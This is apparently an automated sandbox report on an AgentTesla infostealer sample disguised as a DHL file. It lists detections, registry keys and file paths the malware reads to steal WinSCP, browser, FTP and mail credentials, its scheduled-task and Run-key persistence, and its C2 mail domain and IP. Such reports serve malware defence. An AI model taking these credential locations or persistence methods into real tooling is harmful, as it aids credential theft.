                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.0000000003302000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 7924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7196, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 7924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7196, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.0000000003302000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 7924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7196, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		221
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Hidden Files and Directories                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430783 Sample: DHL_1003671162.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 59 mail.clslk.com 2->59 63 Snort IDS alert for network traffic 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 11 other signatures 2->69 8 DHL_1003671162.exe 7 2->8         started        12 qmUxKv.exe 5 2->12         started        14 boqXv.exe 2->14         started        16 boqXv.exe 2->16         started        signatures3 process4 file5 55 C:\Users\user\AppData\Roaming\qmUxKv.exe, PE32 8->55 dropped 57 C:\Users\user\AppData\Local\...\tmp3999.tmp, XML 8->57 dropped 83 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->83 85 Uses schtasks.exe or at.exe to add and modify task schedules 8->85 87 Adds a directory exclusion to Windows Defender 8->87 18 DHL_1003671162.exe 1 5 8->18         started        23 powershell.exe 23 8->23         started        25 schtasks.exe 1 8->25         started        89 Antivirus detection for dropped file 12->89 91 Multi AV Scanner detection for dropped file 12->91 93 Machine Learning detection for dropped file 12->93 27 qmUxKv.exe 4 12->27         started        37 2 other processes 12->37 95 Injects a PE file into a foreign processes 14->95 29 boqXv.exe 14->29         started        31 schtasks.exe 14->31         started        33 boqXv.exe 16->33         started        35 schtasks.exe 16->35         started        signatures6 process7 dnsIp8 61 mail.clslk.com 50.87.253.239, 49733, 49736, 49738 UNIFIEDLAYER-AS-1US United States 18->61 51 C:\Users\user\AppData\Roaming\...\boqXv.exe, PE32 18->51 dropped 53 C:\Users\user\...\boqXv.exe:Zone.Identifier, ASCII 18->53 dropped 71 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->71 73 Tries to steal Mail credentials (via file / registry access) 18->73 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->75 77 Loading BitLocker PowerShell Module 23->77 39 WmiPrvSE.exe 23->39         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 31->45         started        79 Tries to harvest and steal ftp login credentials 33->79 81 Tries to harvest and steal browser information (history, passwords, etc) 33->81 47 conhost.exe 35->47         started        49 conhost.exe 37->49         started        file9 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DHL_1003671162.exe58%VirustotalBrowse
                      DHL_1003671162.exe63%ReversingLabsByteCode-MSIL.Trojan.Taskun
                      DHL_1003671162.exe100%AviraHEUR/AGEN.1323731
                      DHL_1003671162.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe100%AviraHEUR/AGEN.1323731
                      C:\Users\user\AppData\Roaming\qmUxKv.exe100%AviraHEUR/AGEN.1323731
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\qmUxKv.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe63%ReversingLabsByteCode-MSIL.Trojan.Taskun
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe58%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\qmUxKv.exe63%ReversingLabsByteCode-MSIL.Trojan.Taskun
                      C:\Users\user\AppData\Roaming\qmUxKv.exe58%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.clslk.com2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://mail.clslk.com100%Avira URL Cloudmalware
                      http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                      http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                      http://www.zhongyicts.com.cn1%VirustotalBrowse
                      http://www.founder.com.cn/cn0%VirustotalBrowse
                      http://mail.clslk.com2%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.clslk.com
                      		50.87.253.239
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://mail.clslk.comDHL_1003671162.exe, 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.fontbureau.com/designers/?DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://account.dyn.com/DHL_1003671162.exe, 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers?DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.tiro.comDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL_1003671162.exe, 00000000.00000002.1690593567.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 00000007.00000002.1728354948.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 0000000C.00000002.1839427071.000000000361A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000011.00000002.1901714817.0000000002623000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comDHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              50.87.253.239
                                              		mail.clslk.comUnited States
                                              		46606UNIFIEDLAYER-AS-1UStrue

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1430783
                                              Start date and time:2024-04-24 07:14:18 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 0s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:DHL_1003671162.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@29/16@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 430
                                              • Number of non-executed functions: 25
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              06:15:12Task SchedulerRun new task: qmUxKv path: C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              06:15:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
